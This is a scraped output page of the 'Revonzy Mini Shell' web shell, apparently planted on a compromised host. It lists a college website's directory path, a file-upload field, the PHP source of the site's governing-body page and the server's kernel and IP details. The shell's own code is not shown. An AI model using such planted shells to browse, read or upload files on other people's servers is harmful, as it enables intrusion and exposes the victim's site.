Revonzy Mini Shell

Revonzy Mini Shell

Şuanki Dizin: /home/wwwdreamtechnolo/public_html/swamipolytechnic.org/
Dosya Yükle :
Şuanki Dosya : /home/wwwdreamtechnolo/public_html/swamipolytechnic.org/governing-body.php

<?php
	require_once("78enc22_main7sqww_8d9/lib/functions.php");
	$db = new login_function();
?>
<?php
	require_once("header.php");
?>
	<div class="parent_colour container">				
	<div class="department-main-section">	
		<br />
		<center><h2 class="head-title">Governing Body</h2>
		<?php
			require_once("sidemenu.php");
		?>
		<div class="parent_data_contnr" >
			<table border=2  cellpadding="2px" class="comn_tab brd">
						<thead style="color:#FFFFFF;">
							<td width="50">Sr.No.</td>
							<td width="250">Name </td>
							<td width="250">Designation</td>
						</thead>
							<?php
										$report_details = $db->get_all_governing_body();
										if(!empty($report_details))
										{
											$counter =0;
											foreach($report_details as $record)
											{
												$id				=	$report_details[$counter][0];
												$title			=	$report_details[$counter][1];
												$designation			=	$report_details[$counter][2];
									?>
									 <tr>
                                            <td><?php echo $counter+1; ?></td>
											<td style="text-align:left;"><?php echo $title; ?></td>
											<td style="text-align:left;"><?php echo $designation; ?></td>
										</tr>
									 <?php
										$counter ++;
											}
										}else
										{
										?>
										<td colspan="4">No Data Found...</td>
										<?php
										}
									   
									   
									   ?>
									   </table>
									   </div>			
	</div>
</div>

<?php
	require_once("footer.php");
?>

EliteHackz.ORG
Revonzy Mini Shell
root@revonzy.com

Linux 65-254-81-4.cprapid.com 5.14.0-284.11.1.el9_2.x86_64 #1 SMP PREEMPT_DYNAMIC Tue May 9 05:49:00 EDT 2023 x86_64
Apache
65.254.81.4